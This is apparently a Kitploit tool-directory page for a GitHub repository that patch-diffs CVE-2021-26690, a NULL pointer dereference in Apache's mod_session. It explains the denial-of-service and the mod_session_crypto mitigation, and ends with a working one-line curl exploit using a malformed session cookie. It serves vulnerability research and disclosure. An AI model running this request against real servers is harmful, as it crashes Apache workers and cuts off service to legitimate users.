Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-26690---Apache-mod_session — CVE-2021-26690 patch diffing - Apache HTTP mod_session NULL pointer dereference | Kitploit
Tools/GitHubGitHub/7own/cve-2021-26690---apache-mod_session
Vulnerability AnalysisExploitationWeb SecurityPenetration Testing
GitHub7own/cve-2021-26690---apache-mod_session

CVE-2021-26690---Apache-mod_session

CVE-2021-26690 patch diffing - Apache HTTP mod_session NULL pointer dereference

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
111 year agoNot yet reviewed

Patch diffing for CVE-2021-26690 - Apache mod_session

This vulnerability is a NULL pointer dereference within the mod_session Apache's module. It will cause a denial of service for the child processes of Apache's httpd. By using a repetitive loop, each Apache workers will crash, leading to a denial of service for all clients that connect to or are connected to the website.

This vulnerability was initially discovered by @antonio-morales.

For the full stages of the process, refer to the PDF in this repository.

Limitation

If the server implements the SessionCryptoPassphrase option via mod_session_crypto the cookie will be encrypted and base64 encoded.

root@kitploit:~
<IfModule mod_session.c>
Session On
SessionCookieName session path=/
SessionCryptoPassphrase "YourSecurePassphrase"
SessionMaxAge 1800
</IfModule>

In this case, the session cookie pairs cannot be tampered, and the denial of service cannot occur as is.

Exploit

root@kitploit:~
curl http://$IP:$PORT/ -v -b 'session=expiry=123456789&='
Download Tool